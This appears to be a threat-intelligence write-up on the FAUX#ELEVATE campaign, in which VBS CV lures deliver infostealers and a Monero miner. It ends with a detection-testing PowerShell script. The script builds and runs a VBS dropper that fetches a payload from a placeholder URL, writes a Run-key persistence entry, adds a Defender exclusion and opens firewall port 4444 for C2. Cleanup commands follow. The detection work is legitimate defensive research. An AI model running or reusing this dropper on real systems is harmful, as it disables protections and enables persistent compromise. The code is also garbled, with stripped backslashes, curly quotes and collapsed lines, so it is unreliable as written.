Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers Targeting Enterprise Environments

Summary

A cybercrime operation leverages a malicious VBS resume file to target French-speaking enterprise environments. The dropper is highly obfuscated and is designed to execute only on domain-joined machines, where it delivers credential-stealing malware alongside a Monero miner. The campaign uses trusted services such as Dropbox and compromised Moroccan WordPress sites to host payloads. Stolen data is exfiltrated through SMTP to mail.ru, and the malware removes traces after execution to reduce forensic visibility.

Investigation

Researchers reverse engineered the VBS dropper, uncovered its environment checks, and mapped the full multi-stage infection chain, including 7-Zip extraction, a custom RAT named RuntimeHost.exe, ChromElevator browser credential theft, and XMRig mining activity. They also identified supporting infrastructure such as IP addresses, dynamic DNS entries, and hacked WordPress servers. Persistence was linked to registry Run keys and a concealed scheduled task.

Mitigation

Defenders should block suspicious VBS files and enforce strict controls on email attachments. Monitoring should focus on abnormal execution of wscript.exe, PowerShell commands that add Defender exclusions, and registry changes affecting EnableLUA. Organizations should restrict outbound SMTP from non-mail applications and watch connections to known Dropbox and mining-pool infrastructure. Any identified registry keys or scheduled tasks should be removed or quarantined.

Response

Security teams should detect creation of the “Microsoft Media Service” and “z_MicrosoftEdgeAutoLaunch_2EDFBF” Run keys, along with the hidden “MicrosoftUpdateService” scheduled task. Alerts should fire on wscript.exe processes that reach out to Dropbox or the documented WordPress domains. Malicious files must be quarantined, the host isolated, and exposed browser credentials reset. A forensic review should then determine whether any stolen data was exfiltrated through mail.ru.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

• Attack Narrative & Commands:

  1. Stage 1 – Drop malicious VBS: The attacker writes a VBS dropper that downloads a second-stage payload and writes a registry run key for persistence.
  2. Stage 2 – Execute VBS via wscript.exe with PowerShell as the parent process, thereby satisfying the detection’s parent‑child condition.
  3. Stage 3 – Within the VBS, invoke PowerShell to add a Microsoft Defender exclusion (T1562.001) and Netsh to open inbound TCP port 4444 (T1562.004) for C2.
  4. Stage 4 – Clean up evidence after success.

• Regression Test Script: (PowerShell – self‑contained; run with administrative rights)

  
  # -----------------------------------------------------------------------
  # Malicious VBS Dropper Simulation – triggers Sigma rule:
  #   Image == "*wscript.exe" AND ParentImage in ("*\powershell.exe","*\netsh.exe")
  # -----------------------------------------------------------------------
  
  $vbsPath = "$env:Tempmalicious_dropper.vbs"
  $payloadUrl = "http://example.com/payload.exe"   # placeholder URL
  $payloadPath = "$env:Temppayload.exe"
  
  # 1. Create malicious VBS that:
  #    • Downloads a payload
  #    • Writes a Run key for persistence
  #    • Calls PowerShell to add Defender exclusion
  #    • Calls Netsh to open a firewall rule
  $vbsContent = @"
  Set objXML = CreateObject("Microsoft.XMLHTTP")
  objXML.Open "GET", "$payloadUrl", False
  objXML.Send
  If objXML.Status = 200 Then
  Set objStream = CreateObject("ADODB.Stream")
  objStream.Type = 1
  objStream.Open
  objStream.Write objXML.ResponseBody
  objStream.SaveToFile "$payloadPath", 2
  End If

‘ Persist via Run key Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”

‘ Defender exclusion via PowerShell (executed inline) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True

‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Launch the VBS with PowerShell as the parent process
Write-Host "[*] Launching malicious VBS via wscript.exe (parent: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Verify that firewall rule was added (optional)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Cleanup artifacts (payload & VBS) – left for separate cleanup section
Write-Host "[+] Simulation complete. Review alerts in SIEM."
```

• Cleanup Commands: (run after verification)

  # Remove firewall rule
  netsh advfirewall firewall delete rule name="MaliciousPort"
  
  # Remove Defender exclusion
  powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"
  
  # Delete persistence Run key
  reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f
  
  # Delete files
  Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
  Remove-Item -Path "$env:Temppayload.exe" -Force
  
  Write-Host "[+] Cleanup completed."